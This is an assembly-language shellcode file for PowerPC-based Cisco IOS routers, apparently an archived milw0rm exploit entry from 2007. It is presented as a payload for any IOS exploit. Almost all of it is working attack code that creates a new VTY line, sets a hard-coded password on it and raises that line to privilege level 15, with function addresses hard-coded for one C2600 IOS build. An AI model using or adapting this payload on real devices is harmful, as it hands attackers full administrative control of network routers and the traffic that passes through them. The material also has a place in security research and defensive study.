# ----------------------------------------------------------------------------------------
# Cisco IOS Bind shellcode v1.0
# (c) 2007 IRM Plc
# By Varun Uppal
# ----------------------------------------------------------------------------------------
# The code creates a new VTY, allocates a password then sets the privilege level to 15
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length
# The following four hard-coded addresses must be located for the target IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the code
# IOS-version-independent
# The hard-coded addresses used here are for:
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
# ----------------------------------------------------------------------------------------
.equ makenewvty, 0x803d0d08
.equ malloc, 0x804785cc
.equ setpwonline, 0x803b9e90
.equ linesstruct, 0x82f9e334
# ----------------------------------------------------------------------------------------
.equ priv, 0xf1000000 #value used to set the privilege level
main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha
la 9,makenewvty@l(9)
mtctr 9
bctrl #makenewvty()
li 3,0x1e5c
lis 9,malloc@ha
la 9,malloc@l(9)
mtctr 9
bctrl #malloc() memory for structure
li 4,70
stw 4,0xa68(3)
li 5,72
stw 5,0xa6c(3)
li 4,0x00
bl setp #pointer to the password into LR
.string "1rmp455" #the password for the line
setp: mflr 5
lis 9,setpwonline@ha
la 9,setpwonline@l(9)
mtctr 9
bctrl #setpwonline()
lis 8,linesstruct@ha
la 8,linesstruct@l(8)
lwz 9,0(8)
lis 7,priv@ha
la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15
# milw0rm.com [2008-08-13]